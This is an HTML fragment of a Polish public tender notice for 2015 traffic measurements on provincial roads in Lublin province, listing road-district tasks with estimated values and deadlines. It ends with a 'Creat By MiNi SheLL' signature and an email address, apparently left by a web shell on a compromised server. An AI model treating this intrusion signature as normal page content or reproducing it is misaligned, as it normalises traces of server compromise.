<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie II - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Chełmie.
Szczegółowy opis usługi zawarty jest w Instrukcji o sposobie przeprowadzenia Generalnego Pomiaru Ruchu na sieci dróg wojewódzkich województwa lubelskiego w 2015 roku
Szacunkowa wartość Zadania II wynosi: 32.256,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.71.27.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie Generalnego Pomiaru Ruchu na drogach wojewódzkich województwa lubelskiego w 2015 roku:
Zadanie III - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Hrubieszowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie III - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Hrubieszowie.
Szczegółowy opis usługi zawarty jest w Instrukcji o sposobie przeprowadzenia Generalnego Pomiaru Ruchu na sieci dróg wojewódzkich województwa lubelskiego w 2015 roku
Szacunkowa wartość Zadania III wynosi: 29.088,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.71.27.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie Generalnego Pomiaru Ruchu na drogach wojewódzkich województwa lubelskiego w 2015 roku:
Zadanie IV - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Lublinie z/s w Bychawie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie IV - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Lublinie z/s w Bychawie.
Szczegółowy opis usługi zawarty jest w Instrukcji o sposobie przeprowadzenia Generalnego Pomiaru Ruchu na sieci dróg wojewódzkich województwa lubelskiego w 2015 roku.
Szacunkowa wartość Zadania IV wynosi: 66.528,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.71.27.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie Generalnego Pomiaru Ruchu na drogach wojewódzkich województwa lubelskiego w 2015 roku:
Zadanie V - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Parczewie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie V - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Parczewie.
Szczegółowy opis usługi zawarty jest w Instrukcji o sposobie przeprowadzenia Generalnego Pomiaru Ruchu na sieci dróg wojewódzkich województwa lubelskiego w 2015 roku.
Szacunkowa wartość Zadania V wynosi: 37.152,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.71.27.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie Generalnego Pomiaru Ruchu na drogach wojewódzkich województwa lubelskiego w 2015 roku:
Zadanie VI - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Puławach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie VI - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Puławach.
Szczegółowy opis usługi zawarty jest w Instrukcji o sposobie przeprowadzenia Generalnego Pomiaru Ruchu na sieci dróg wojewódzkich województwa lubelskiego w 2015 roku
Szacunkowa wartość Zadania VI wynosi: 71.856,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.71.27.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wykonanie Generalnego Pomiaru Ruchu na drogach wojewódzkich województwa lubelskiego w 2015 roku:
Zadanie VII - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW we Włodawie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie VII - wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW we Włodawie.
Szczegółowy opis usługi zawarty jest w Instrukcji o sposobie przeprowadzenia Generalnego Pomiaru Ruchu na sieci dróg wojewódzkich województwa lubelskiego w 2015 roku
Szacunkowa wartość Zadania VII wynosi: 25.200,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.71.27.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wykonanie Generalnego Pomiaru Ruchu na drogach wojewódzkich województwa lubelskiego w 2015 roku:
Zadanie VIII- wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Zamościu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie VIII- wykonanie pomiarów ruchu na drogach wojewódzkich na obszarze działania RDW w Zamościu
Szczegółowy opis usługi zawarty jest w Instrukcji o sposobie przeprowadzenia Generalnego Pomiaru Ruchu na sieci dróg wojewódzkich województwa lubelskiego w 2015 roku
Szacunkowa wartość Zadania VII wynosi: 61.056,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.71.27.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com